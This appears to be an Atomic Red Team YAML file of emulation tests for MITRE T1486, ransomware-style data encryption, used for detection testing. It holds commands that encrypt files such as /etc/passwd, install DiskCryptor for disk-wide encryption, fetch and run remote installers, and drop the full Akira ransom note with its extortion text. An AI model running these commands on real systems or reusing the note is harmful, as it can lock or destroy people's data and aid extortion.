attack_technique: T1486 display_name: Data Encrypted for Impact atomic_tests: - name: Encrypt files using gpg (FreeBSD/Linux) auto_generated_guid: 7b8ce084-3922-4618-8d22-95f996173765 description: | Uses gpg to encrypt a file supported_platforms: - linux input_arguments: pwd_for_encrypted_file: description: the password that you want for the encrypted file type: string default: passwd encrypted_file_path: description: path to the encrypted file type: path default: /tmp/passwd.gpg input_file_path: description: path to the file that you want to encrypt type: path default: /etc/passwd encryption_alg: description: encryption algorithm of the file type: string default: AES-256 dependency_executor_name: bash dependencies: - description: | Finds where gpg is located prereq_command: | which_gpg=`which gpg` get_prereq_command: | (which pkg && pkg install -y gnupg)||(which yum && yum -y install epel-release gpg)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y gpg) executor: name: sh elevation_required: false command: | echo "#{pwd_for_encrypted_file}" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c #{input_file_path} cleanup_command: | rm #{encrypted_file_path} - name: Encrypt files using 7z (FreeBSD/Linux) auto_generated_guid: 53e6735a-4727-44cc-b35b-237682a151ad description: | Uses 7z to encrypt a file supported_platforms: - linux input_arguments: pwd_for_encrypted_file: description: the password that you want for the encrypted file type: string default: passwd encrypted_file_path: description: path to the encrypted file type: path default: /tmp/passwd.zip input_file_path: description: path to the file that you want to encrypt type: path default: /etc/passwd dependency_executor_name: bash dependencies: - description: | Finds where 7z is located prereq_command: | which_7z=`which 7z` get_prereq_command: | (which pkg && pkg install -y 7-zip) executor: name: sh elevation_required: false command: | $which_7z a -p#{pwd_for_encrypted_file} #{encrypted_file_path} #{input_file_path} cleanup_command: | $which_7z e #{encrypted_file_path} rm #{encrypted_file_path} - name: Encrypt files using ccrypt (FreeBSD/Linux) auto_generated_guid: 08cbf59f-85da-4369-a5f4-049cffd7709f description: | Attempts to encrypt data on target systems as root to simulate an interruption authentication to target system. If root permissions are not available then attempts to encrypt data within user's home directory. supported_platforms: - linux input_arguments: cped_file_path: description: Path where you want your copied file to be type: path default: /tmp/passwd root_input_file_path: description: Path the target file to be encrypted. File will be copied to /tmp/ before encrypting type: path default: /etc/passwd pwd_for_encrypted_file: description: Password to use for encryption type: string default: passwd dependency_executor_name: sh dependencies: - description: | Finds where ccencrypt and ccdecrypt are located prereq_command: | which_ccencrypt=`which ccencrypt` which_ccdecrypt=`which ccdecrypt` get_prereq_command: | (which pkg && pkg install -y ccript)||(which yum && yum -y install epel-release ccrypt)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y ccrypt) executor: name: sh elevation_required: false command: | which_ccencrypt=`which ccencrypt` cp #{root_input_file_path} #{cped_file_path}; $which_ccencrypt -T -K #{pwd_for_encrypted_file} #{cped_file_path} cleanup_command: | rm #{cped_file_path}.cpt - name: Encrypt files using openssl (FreeBSD/Linux) auto_generated_guid: 142752dc-ca71-443b-9359-cf6f497315f1 description: | Uses openssl to encrypt a file supported_platforms: - linux input_arguments: private_key_path: description: path to the private key type: path default: /tmp/key.pem public_key_path: description: path to the public key type: path default: /tmp/pub.pem encryption_bit_size: description: size of the bit of encryption type: integer default: 2048 encrypted_file_path: description: path to the encrypted file type: path default: /tmp/passwd.zip input_file_path: description: path to the file that you want to encrypt type: path default: /etc/passwd dependency_executor_name: bash dependencies: - description: | Finds where openssl is located prereq_command: | which_openssl=`which openssl` get_prereq_command: | executor: name: sh elevation_required: false command: | which_openssl=`which openssl` $which_openssl genrsa -out #{private_key_path} #{encryption_bit_size} $which_openssl rsa -in #{private_key_path} -pubout -out #{public_key_path} $which_openssl rsautl -encrypt -inkey #{public_key_path} -pubin -in #{input_file_path} -out #{encrypted_file_path} cleanup_command: | $which_openssl rsautl -decrypt -inkey #{private_key_path} -in #{encrypted_file_path} rm #{encrypted_file_path} - name: PureLocker Ransom Note auto_generated_guid: 649349c7-9abf-493b-a7a2-b1aa4d141528 description: | building the IOC (YOUR_FILES.txt) for the PureLocker ransomware https://www.bleepingcomputer.com/news/security/purelocker-ransomware-can-lock-files-on-windows-linux-and-macos/ supported_platforms: - windows executor: name: command_prompt elevation_required: true command: | echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt cleanup_command: | del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1 - name: Encrypt files using 7z utility - macOS auto_generated_guid: 645f0f5a-ef09-48d8-b9bc-f0e24c642d72 description: | This test encrypts the file(s) using the 7z utility supported_platforms: - macos dependency_executor_name: sh dependencies: - description: | Check if 7z command exists on the machine prereq_command: | which 7z get_prereq_command: | echo Installing 7z, using brew /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" brew install p7zip input_arguments: file_password: description: Password to be provided for archiving the file type: string default: ARTPass encrypted_file_name: description: Name of the archive to be created type: string default: ARTArchive.7z input_file_path: description: Path to the file that you want to encrypt type: path default: ~/test.txt executor: command: | 7z a -p #{file_password} -mhe=on #{encrypted_file_name} #{input_file_path} cleanup_command: | rm #{encrypted_file_name} name: sh elevation_required: false - name: Encrypt files using openssl utility - macOS auto_generated_guid: 1a01f6b8-b1e8-418e-bbe3-78a6f822759e description: | This test encrypts the file(s) using the openssl utility supported_platforms: - macos input_arguments: encryption_option: description: Specifiy the required encryption option type: string default: -pbkdf2 input_file_path: description: Path to the file that you want to encrypt type: path default: ~/test.txt output_file_name: description: Path to the file that you want to encrypt type: string default: ARTFile executor: command: | openssl enc #{encryption_option} -in #{input_file_path} -out #{output_file_name} cleanup_command: | rm #{output_file_name} name: sh elevation_required: false - name: Data Encrypted with GPG4Win auto_generated_guid: 4541e2c2-33c8-44b1-be79-9161440f1718 description: Gpg4win is a Windows tool (also called Kleopatra which is the preferred certificate manager) that uses email and file encryption packages for symmetric encryption. It is used by attackers to encrypt disks. User will need to add pass phrase to encrypt file as automation is not allowed under newer versions. supported_platforms: - windows input_arguments: GPG_Exe_Location: description: Path of the GPG program type: path default: 'C:\Program Files (x86)\GnuPG\bin\gpg.exe' File_to_Encrypt_Location: description: Path of File type: path default: '$env:temp\test.txt' dependencies: - description: | GPG must exist at (#{GPG_Exe_Location}). If -GetPrereqs fails, try to install GPG4WIN manually at 'https://www.gpg4win.org/download.html'. Once done, run -CheckPrereqs to confirm that it works. prereq_command: | if (test-path '#{GPG_Exe_Location}'){exit 0} else {exit 1} get_prereq_command: | Set-Content -Path "#{File_to_Encrypt_Location}" -Value "populating this file with some text" # Create the test.txt file New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null invoke-webrequest "https://files.gpg4win.org/gpg4win-4.1.0.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\gpginstall.exe" cmd /c "PathToAtomicsFolder\..\ExternalPayloads\gpginstall.exe" /S executor: name: powershell elevation_required: false command: | Set-Content -Path "#{File_to_Encrypt_Location}" -Value "populating this file with some text" # Create the test.txt file again in case prereqs failed cmd /c "`"C:\Program Files (x86)\GnuPG\bin\gpg.exe`" --passphrase 'SomeParaphraseBlah' --batch --yes -c `"#{File_to_Encrypt_Location}`"" cleanup_command: | Remove-Item -Path "#{File_to_Encrypt_Location}" -Force -ErrorAction SilentlyContinue Remove-Item -Path "#{File_to_Encrypt_Location}.gpg" -Force -ErrorAction SilentlyContinue - name: Data Encrypt Using DiskCryptor auto_generated_guid: 44b68e11-9da2-4d45-a0d9-893dabd60f30 description: | DiskCryptor, an open source encryption utility, can be exploited by adversaries for encrypting all disk partitions, including system partitions. This tool was identified in a ransomware campaign, as reported on https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/. The documentation for DiskCryptor can be found at https://github.com/DavidXanatos/DiskCryptor. During the installation process, running dcrypt.exe starts the encryption console. It's important to note that a system reboot is necessary as part of the installation. supported_platforms: - windows input_arguments: dcrypt_exe: description: The dcrypt.exe executable from dcrypt_setup.exe type: path default: 'dcrypt.exe' dependency_executor_name: powershell dependencies: - description: | dcrypt_setup will be installed at specified location (#{dcrypt_exe}) prereq_command: | if (Test-Path "${env:ProgramFiles}/dcrypt/#{dcrypt_exe}") {exit 0} else {exit 1} get_prereq_command: | Write-Host Downloading DiskCryptor installer New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest "https://github.com/DavidXanatos/DiskCryptor/releases/download/1.1.846.118/dcrypt_setup_1.1.846.118.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\dcrypt_setup_1.1.846.118.exe" Write-Host Install DiskCryptor Start-Process "PathToAtomicsFolder\..\ExternalPayloads\dcrypt_setup_1.1.846.118.exe" -Wait -ArgumentList "/s" executor: name: command_prompt elevation_required: true command: | ""%PROGRAMFILES%\dcrypt"\#{dcrypt_exe}" - name: Akira Ransomware drop Files with .akira Extension and Ransomnote auto_generated_guid: ab3f793f-2dcc-4da5-9c71-34988307263f description: | Dropping 100 files with random content and .akira File Extension and the Akira Ransomnote to c:\ supported_platforms: - windows executor: name: powershell elevation_required: true command: | 1..100 | ForEach-Object { $out = new-object byte[] 1073741; (new-object Random).NextBytes($out); [IO.File]::WriteAllBytes("c:\test.$_.akira", $out) } echo "Hi friends" >> $env:Userprofile\Desktop\akira_readme.txt echo "" >> $env:Userprofile\Desktop\akira_readme.txt echo "Whatever who you are and what your title is if you' re reading this it means the internal infrastructure of your company is fully or partially dead, all your backups - virtual, physical - everything that we managed to reach - are completely removed. Moreover, we have taken a great amount of your corporate data prior to encryption Well, for now let's keep all the tears and resentment to ourselves and try to build a constructive dialogue. We're fully aware of what damage we caused by locking your internal sources. At the moment. you have to know: " >> $env:Userprofile\Desktop\akira_readme.txt echo "1. Dealing with us you will save A LOT due to we are not interested in ruining your financially. We will study in depth your finance, bank income statements, your savings, investments etc. and present our reasonable demand to you. If you have an active cyber insurance, let us know and we will guide you how to properly use it. Also, dragging out the negotiation process will lead to failing of a deal" >> $env:Userprofile\Desktop\akira_readme.txt echo "2. Paying us you save your TIME, MONEY, EFFORTS and be back on track within 24 hours approximately. Our decryptor works properly on any files or systems, so you will be able to check it by requesting a test decryption service from the beginning of our conversation. [f you decide to recover on your own, keep in mind that you can permanently lose access to some files or accidently corrupt them — in this case we won't be able to help. " >> $env:Userprofile\Desktop\akira_readme.txt echo "3. The security report or the exclusive first-hand information that you will receive upon reaching an agreement is of a great value, since NO full audit of your network will show you the vulnerabilities that we' ve managed to detect and used in order to get into. identify backup solutions and upload your data." >> $env:Userprofile\Desktop\akira_readme.txt echo "4. As for your data, if we fail to agree, we will try to sell personal information/trade secrets/databases/source codes — generally speaking, everything that has a value on the darkmarket - to multiple threat actors at ones." >> $env:Userprofile\Desktop\akira_readme.txt echo "Then all of this will be published in our blog -" >> $env:Userprofile\Desktop\akira_readme.txt echo "" >> $env:Userprofile\Desktop\akira_readme.txt echo "https://akira.onion" >> $env:Userprofile\Desktop\akira_readme.txt echo "" >> $env:Userprofile\Desktop\akira_readme.txt echo "5. We're more than negotiable and will definitely find the way to settle this quickly and reach an agreement which will satisfy both of us" >> $env:Userprofile\Desktop\akira_readme.txt echo "" >> $env:Userprofile\Desktop\akira_readme.txt echo "If you' re indeed interested in our assistance and the services we provide you can reach out to us following simple instructions:" >> $env:Userprofile\Desktop\akira_readme.txt echo "" >> $env:Userprofile\Desktop\akira_readme.txt echo "1. Install TOR Browser to get access to our chat room - https://www.torproject.org/download/." >> $env:Userprofile\Desktop\akira_readme.txt echo "2. Paste this link - https://akira.onion" >> $env:Userprofile\Desktop\akira_readme.txt echo "3. Use this code - - to log into our chat." >> $env:Userprofile\Desktop\akira_readme.txt echo "" >> $env:Userprofile\Desktop\akira_readme.txt echo "Keep in mind that the faster you will get in touch, the less damage we cause" >> $env:Userprofile\Desktop\akira_readme.txt cleanup_command: | del $env:Userprofile\Desktop\akira_readme.txt del c:\test.*.akira